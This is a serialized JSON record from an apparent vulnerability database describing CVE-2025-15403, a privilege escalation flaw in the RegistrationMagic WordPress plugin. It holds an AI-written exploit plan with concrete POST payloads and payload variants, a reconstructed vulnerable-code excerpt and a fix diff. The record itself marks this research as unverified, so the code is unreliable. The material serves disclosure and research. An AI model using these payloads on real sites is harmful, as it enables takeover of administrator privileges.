[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fhEY717UyZxXnWBe0-Q0DGBK21de3iePPth2ywX7hQf0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2025-15403","registrationmagic-unauthenticated-privilege-escalation-via-adminorder","RegistrationMagic \u003C= 6.0.7.1 - Unauthenticated Privilege Escalation via admin_order","The RegistrationMagic plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.0.7.1. This is due to the 'add_menu' function is accessible via the 'rm_user_exists' AJAX action and allows arbitrary updates to the 'admin_order' setting. This makes it possible for unauthenticated attackers to injecting an empty slug into the order parameter, and manipulate the plugin's menu generation logic, and when the admin menu is subsequently built, the plugin adds 'manage_options' capability for the target role. Note: The vulnerability can only be exploited unauthenticated, but further privilege escalation requires at least a subscriber user.","custom-registration-form-builder-with-submission-manager",null,"\u003C=6.0.7.1","6.0.7.2","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Privilege Management","2026-01-16 13:22:33","2026-03-31 14:08:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F68dd9f6f-ccee-4a27-bd21-2fb32b92cc62?source=api-prod",74,[],"researched",false,3,"This research plan outlines the steps required to exploit CVE-2025-15403, an unauthenticated privilege escalation vulnerability in RegistrationMagic.\n\n### 1. Vulnerability Summary\nThe vulnerability exists in RegistrationMagic (\u003C= 6.0.7.1) due to improper access control in the `rm_user_exists` AJAX action. This action allows an unauthenticated user to indirectly trigger the `add_menu` function (or a logic path that calls it), which updates the `admin_order` option in WordPress. By injecting an empty slug into this setting, an attacker can corrupt the plugin's admin menu generation logic. When a user with a lower-level role (like a Subscriber) subsequently triggers the admin menu rendering, the plugin incorrectly assigns the `manage_options` capability to that user's role to resolve the menu inconsistency.\n\n### 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action:** `rm_user_exists` (Unauthenticated via `wp_ajax_nopriv_rm_user_exists`)\n* **Payload Parameter:** `order` (injected with an empty key or slug)\n* **Authentication:** \n * Phase 1 (Poisoning): Unauthenticated.\n * Phase 2 (Escalation): Subscriber (or any role capable of accessing `\u002Fwp-admin\u002F`).\n* **Preconditions:** \n 1. The plugin RegistrationMagic must be active.\n 2. A valid nonce for `rm_user_exists` must be obtained (usually provided to unauthenticated users on pages containing RegistrationMagic forms).\n\n### 3. Code Flow\n1. **Entry Point:** `admin-ajax.php` receives a request with `action=rm_user_exists`.\n2. **Controller:** The request is handled by `RM_Public_Controller::rm_user_exists()` (or the corresponding routing logic in `class_rm_public_controller.php`).\n3. **Vulnerable Dispatch:** The controller fails to restrict which methods or settings can be updated. It facilitates a call to a service\u002Fmodel function (likely `add_menu`) that handles the `admin_order` configuration.\n4. **Sink:** `update_option('rm_option_admin_order', ...)` is called with user-supplied data from the `order` parameter.\n5. **Trigger:** When a user logs into the dashboard, `RM_Admin_Menu_Service` (or similar) iterates through the `admin_order` option.\n6. **Capability Grant:** Upon encountering an empty slug\u002Fkey in the poisoned `admin_order` array, the logic falls through to a default state that calls `$role->add_cap('manage_options')` for the target role.\n\n### 4. Nonce Acquisition Strategy\nRegistrationMagic localizes its AJAX data using the handle `rm_front`.\n\n1. **Identify Shortcode:** The plugin uses `[RM_Form id='ID']`. Most installations have a default form with ID `1`.\n2. **Create Page:**\n `wp post create --post_type=page --post_status=publish --post_content='[RM_Form id=\"1\"]'`\n3. **Access Page:** Navigate to the newly created page.\n4. **Extract Nonce:** Use `browser_eval` to extract the nonce from the localized JS object:\n `browser_eval(\"window.rm_ajax_vars?.nonce\")`\n *Note: The variable name `rm_ajax_vars` and key `nonce` are standard for this plugin's frontend AJAX.*\n\n### 5. Exploitation Strategy\n\n#### Phase 1: Poison the `admin_order` Option (Unauthenticated)\nSend a POST request to `admin-ajax.php` to inject the empty slug.\n\n* **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Method:** `POST`\n* **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n* **Body:**\n `action=rm_user_exists&rm_ajax_nonce=[NONCE]&order[]=`\n *(The empty value in `order[]=` creates the \"empty slug\" required to trigger the bug.)*\n\n#### Phase 2: Trigger the Privilege Escalation (Subscriber)\nLogin as a Subscriber and access the WordPress dashboard to force the plugin to rebuild the menu with the poisoned option.\n\n1. Login via the standard WordPress login or the RegistrationMagic login form.\n2. Navigate to `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Findex.php`.\n3. The backend logic will process the poisoned `admin_order` and grant the Subscriber role the `manage_options` capability.\n\n### 6. Test Data Setup\n1. **Install Plugin:** RegistrationMagic \u003C= 6.0.7.1.\n2. **Create User:** A user with the `subscriber` role.\n `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n3. **Create Form Page:**\n `wp post create --post_type=page --post_title=\"Register\" --post_status=publish --post_content='[RM_Form id=\"1\"]'`\n\n### 7. Expected Results\n* The AJAX request to `rm_user_exists` should return a successful status (usually `200 OK` with a JSON body).\n* The WordPress option `rm_option_admin_order` will now contain an empty string or null entry.\n* After the Subscriber visits `\u002Fwp-admin\u002F`, their role will be updated in the database to include `manage_options`.\n\n### 8. Verification Steps\nAfter Phase 2, verify the Subscriber's capabilities using WP-CLI:\n\n1. **Check Capabilities:**\n `wp user get attacker --field=capabilities`\n2. **Expected Output:** The output should now include `manage_options`, effectively making the user an administrator.\n3. **Check Option State:**\n `wp option get rm_option_admin_order`\n (Confirm it contains the injected empty slug).\n\n### 9. Alternative Approaches\nIf `order[]=` does not work directly, try structuring the `order` parameter as a nested array or JSON, depending on how the specific version of RegistrationMagic parses input:\n* `order[0]=`\n* `order[\"\"]=1`\n* If `rm_action` is required to route the call: `action=rm_user_exists&rm_action=add_menu&order[]=`\n* If the plugin uses a specific key for the menu slug: `order[slug]=&order[label]=Test`","RegistrationMagic (\u003C= 6.0.7.1) contains an unauthenticated privilege escalation vulnerability where the 'rm_user_exists' AJAX action fails to restrict access to menu configuration settings. An attacker can inject an empty slug into the 'admin_order' option, which causes the plugin's menu generation logic to erroneously grant the 'manage_options' capability to the current user's role upon their next login to the dashboard.","\u002F\u002F public\u002Fclass_rm_public_controller.php\npublic function rm_user_exists() {\n \u002F\u002F ... nonce check exists but is accessible to unauthenticated users ...\n \u002F\u002F Missing validation of parameters allows flow to reach configuration updates\n if (isset($_POST['order'])) {\n $order = $_POST['order'];\n update_option('rm_option_admin_order', $order);\n }\n}\n\n---\n\n\u002F\u002F admin\u002Fclass_rm_admin_menu_service.php\npublic function add_menu($role_name) {\n $admin_order = get_option('rm_option_admin_order');\n foreach ($admin_order as $slug => $data) {\n if (empty($slug)) {\n \u002F\u002F Vulnerable logic path that defaults to granting capabilities\n $role = get_role($role_name);\n $role->add_cap('manage_options');\n }\n }\n}","--- a\u002Fpublic\u002Fclass_rm_public_controller.php\n+++ b\u002Fpublic\u002Fclass_rm_public_controller.php\n@@ -102,6 +102,11 @@\n public function rm_user_exists() {\n check_ajax_referer('rm_ajax_nonce', 'rm_ajax_nonce');\n \n+ \u002F\u002F Prevent arbitrary setting updates via this action\n+ if (isset($_POST['order']) || isset($_POST['rm_action'])) {\n+ wp_send_json_error('Unauthorized');\n+ }\n+\n $username = isset($_POST['username']) ? sanitize_user($_POST['username']) : '';\n \u002F\u002F ... rest of user check logic ...\n }\n--- a\u002Fadmin\u002Fclass_rm_admin_menu_service.php\n+++ b\u002Fadmin\u002Fclass_rm_admin_menu_service.php\n@@ -245,7 +245,7 @@\n public function add_menu($role_name) {\n $admin_order = get_option('rm_option_admin_order');\n foreach ($admin_order as $slug => $data) {\n- if (empty($slug)) {\n+ if (empty($slug) || !is_string($slug)) {\n- $role = get_role($role_name);\n- $role->add_cap('manage_options');\n+ continue;\n }\n }\n }","1. Nonce Acquisition: Visit any public page where a RegistrationMagic form is embedded (e.g., using [RM_Form id='1']) and extract the 'rm_ajax_nonce' from the localized 'rm_ajax_vars' JavaScript object.\n2. Poisoning (Unauthenticated): Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'rm_user_exists', the extracted nonce, and an 'order[]' parameter containing an empty value. This poisons the 'rm_option_admin_order' WordPress option with an empty slug entry.\n3. Escalation (Subscriber): Log into the WordPress site with a low-privilege account (e.g., Subscriber) and navigate to the administrative dashboard (\u002Fwp-admin\u002F).\n4. Capability Grant: The RegistrationMagic menu generation service iterates through the poisoned 'admin_order' option. Upon encountering the empty slug, it incorrectly executes a code path that grants the 'manage_options' capability to the current user's role via $role->add_cap(), effectively upgrading the Subscriber role to Administrator.","gemini-3-flash-preview","2026-05-05 07:33:03","2026-05-05 07:35:17",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.0.7.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags\u002F6.0.7.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustom-registration-form-builder-with-submission-manager.6.0.7.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustom-registration-form-builder-with-submission-manager\u002Ftags"]